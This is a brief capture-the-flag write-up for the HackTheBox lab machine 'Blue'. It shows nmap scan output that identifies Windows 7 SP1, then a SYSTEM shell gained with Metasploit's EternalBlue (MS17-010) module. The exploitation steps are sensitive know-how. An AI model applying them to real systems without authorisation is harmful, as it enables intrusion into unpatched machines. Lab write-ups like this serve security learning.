[HackTheBox] Blue

This machine is more about teaching a single exploit than about the usual HTB process. It is still fun and enjoyable!

Summary

  • Enumerate the machine's OS.
  • Use the EternalBlue exploit (MS17-010) to get a shell as nt authority\system.

Recon

Port Scan

nmap -T4 -p- -sV -n 10.10.10.40

PORT      STATE SERVICE      REASON  VERSION
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        syn-ack Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack Microsoft Windows RPC
49156/tcp open  msrpc        syn-ack Microsoft Windows RPC
49157/tcp open  msrpc        syn-ack Microsoft Windows RPC

nmap also shows that this machine is running Windows 7 SP1:

...
OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
...

Exploit

Windows 7 SP1 is vulnerable to the very popular and well-known EternalBlue exploit (MS17-010).

It can be exploited easily with Metasploit's module windows/smb/ms17_010_eternalblue, which instantly gives you a shell as nt authority\system:

C:\Windows\system32>whoami
whoami
nt authority\system